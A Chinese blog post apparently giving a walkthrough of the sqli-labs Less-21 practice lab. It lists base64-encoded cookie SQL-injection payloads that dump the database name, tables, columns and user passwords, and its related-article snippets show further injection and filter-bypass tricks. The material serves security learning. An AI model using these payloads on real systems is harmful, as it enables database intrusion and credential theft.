sqli-labs (less-21)

最新推荐文章于 2024-02-20 08:00:00 发布
最新推荐文章于 2024-02-20 08:00:00 发布
阅读量312 收藏 1
点赞数
分类专栏: sqli-labs 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/114681232
版权

sqli-labs (less-21)

进入21关,输入用户名与密码,发现跟20关基本一样,这里我们猜想也是在cookie的位置进入注入

利用Cookies Manager +抓取到cookie信息后,发现竟然是一串字母,这里就很懵了,但我们仔细查看特征后,发现只是利用了base64加密


转码后发现就是admin,所以这里的思路就是先构造我们的SQL语句,然后再随便找一个base64网站转码就行了
#以下过程均是base64转码后的结果

先输入一个

Jw== #'单引号


屏幕回显错误,根据错误信息判断闭合方式为’),并且为字符型注入

查看当前库

JykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw== #') union select 1,2,database()#


查看security库下的所有表

JykgdW5pb24gc2VsZWN0IDEsMiwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScpIw== #') union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')#


查看users表下的所有字段

JykgdW5pb24gc2VsZWN0IDEsMiwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycpIw== #') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')#


查看username,password字段的所有的值

JykgdW5pb24gc2VsZWN0IDEsMiwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2Vycykj #') union select 1,2,(select group_concat(username,password) from security.users)#

super 硕
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs 21——40关攻略
weixin_45880717的博客
02-02 1058
Less-21 基于错误的复杂的字符型Cookie注入 base64编码,单引号,报错型,cookie型注入。 本关和less-20相似,只是cookie的uname值经过base64编码了。 登录后页面: 圈出来的地方显然是base64加密过的,解码得到:admin,就是刚才登陆的uname,所以猜测:本题在cookie处加密了字符串, 查看php文件确实如此,所以只需要上传paylaod的时...
SQLi LABS Less-21
wangyuxiang946的博客
08-14 1万+
sqlibals21SQLI-LABS第二十一关,sqlilabs二十一关
sqli-labs第二十一关详解(这次用sqlmap)
金 帛的博客
05-09 2660
SQL靶场第二十一关答案详解,这次用sqlmap跑
sqli_libs通关教程
qq_48904485的博客
03-22 5291
less-1 单引号联合注入 1、判断是字符型还是数字型 Id=2-1 与 id=2 结果相同就是字符型 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xnvwRRTo-1647921807254)(C:\Users\23850\AppData\Roaming\Typora\typora-user-images\image-20211023110308434.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bmKZuH51-16479
SQL注入篇——sqli-labs最详细1-40闯关指南
热门推荐
爱国小白帽
01-11 3万+
使用sqllabs游戏系统进行sql注入 1.首先确定用哪些字符可以进行sql注入 一.选择Less­1进入第一关,在网址中添加标红内容,显示了用户和密码 http://localhost/sqllabs­master/Less­1/index.php?id=1’ and 1=1 ­­ ­ 把1=1改成1=2,不报错也不显示任何信息,说明可以利用 ’ 字符注入 二.进入第二关,在网址中添...
sqli-labs-less-12 PODT传参+有回显信息(图文详解)
yzcn
11-02 444
Less-12 post传递参数 由于是post传参,我们先用burp-suite抓包,分析报文体,获取传参过程。 得到报文体之后使用hackbar插件中的post data进行注入实验 判断闭合方式: uname=’ or 1=1 #&passwd=&submit=Submit 登录失败 uname=") or 1=1 #&passwd=&submit=Submit 登录成功,在这里可以得知存在注入点,闭合方式为(“”) 使用order by判断字段列数: uname
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
sqli-labs/Less-21
m0_71299382的博客
11-19 264
sqli-labs第二十一关
sqli-labs关卡21(基于cookie被base64编码的报错盲注)通关思路
zyh1588的博客
11-28 653
小白回顾sql靶场21
sqli-labs第21-28关
永远相信美好的事情即将发生
02-11 1097
Less-21 先登进去看看,用户名admin,密码admin 根据前面的经验,我们尝试抓包看看 注意到有个cookie,并且经过了base64编码,于是猜测可能是cookie注入,但要base64编码,构造admin'(YWRtaW4n) 可以看到报错了,报错信息为:'admin'') LIMIT 0,1,其中有一个单引号是我们输入的,所以可以看出闭合方式为单引号加括号,构造admin')#(YWRtaW4nKSM=) 可以看到恢复正常了,接下来就可以尝试联合查询了,只不过构造的语句要base64
SQL-Labs靶场“21-25”关通关教程
钟言的博客
02-20 1万+
本篇为SQL-Labs靶场的21关到25关通关教程,详细内容包含了、二十一关 基于base64编码单引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 、二十二关 基于base64编码双引号Cookie注入 1、源码分析 2、联合查询注入 3、updatexml报错注入 二十三关 基于GET过滤注释 1、源码分析 2、updatexml报错注入 3、联合查询注入 四、二+四关 基于POST存储型二次注入 1、源码分析 2、二次注入 五、二十五关 基于GET单引号OR、A等等
sqli-labs通关21-25
m0_62207170的博客
02-21 102
sqli-labs通关16-20
SQLI-LAB  的 实战记录(Less 21 - Less 30)
这块盾牌有待改良
07-20 5483
Less - 21 Cookie Injection- Error Based- complex - string Less - 22 Cookie Injection- Error Based- Double Quotes - string
Sqli-Lab | Less 21-23
酉酉的博客
02-08 570
sqli靶场一直没来得及做,趁寒假把它做了,同时巩固下SQL注入 Less-21 Less-21 Cookie Injection- Error Based- complex - string cookie注入-基于错误-复杂-字符串 测试 登录进去 uname的值被加密,以=结尾,首先想到base64 不出意外是base64加密 burp抓包,然后改cookie中的uname再加密就...
Sqli-Labs做题笔记:Less-21 - Less-26a
Forever_Han13的博客
01-23 527
绕过: 过滤关键字 穿插关键字绕过: select selselctect or oorr union ununionion 大小写转换: select SelECt or Or union uNIon 十六进制转换: select selec\x74 or o\x72 union unio\x6e 双重URL编码: select %25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值